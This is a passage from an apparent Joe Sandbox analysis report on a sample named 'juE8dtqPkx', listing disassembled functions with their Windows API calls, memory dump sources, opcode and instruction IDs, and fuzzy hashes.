                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                    • String ID:
                                                    • API String ID: 3539004672-0
                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID:
                                                    • API String ID: 327565842-0
                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    • Opcode ID: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                    • Opcode Fuzzy Hash: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Enum$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 2095303065-0
                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: RectWindow
                                                    • String ID:
                                                    • API String ID: 861336768-0
                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00449598
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                    • _wcslen.LIBCMT ref: 0044960D
                                                    • _wcslen.LIBCMT ref: 0044961A
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 1856069659-0
                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                    • TrackPopupMenuEx.USER32(00AA63A0,00000000,00000000,?,?,00000000), ref: 00447991
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CursorMenuPopupTrack$Proc
                                                    • String ID:
                                                    • API String ID: 1300944170-0
                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 1822080540-0
                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 659298297-0
                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                    APIs
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(00AA1BD8,000000F1,00000000,00000000), ref: 00440E6E
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(00AA1BD8,000000F1,00000001,00000000), ref: 00440E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableMessageSend$LongShow
                                                    • String ID:
                                                    • API String ID: 142311417-0
                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                    • _wcslen.LIBCMT ref: 004458FB
                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 3087257052-0
                                                    • Opcode ID: 6cc24b952e3a2cfd6b1dca4c82ac181d44f2854b1024d3fd347f222e2bb7600f
                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                    • Opcode Fuzzy Hash: 6cc24b952e3a2cfd6b1dca4c82ac181d44f2854b1024d3fd347f222e2bb7600f
                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 245547762-0
                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                    • String ID:
                                                    • API String ID: 2338827641-0
                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
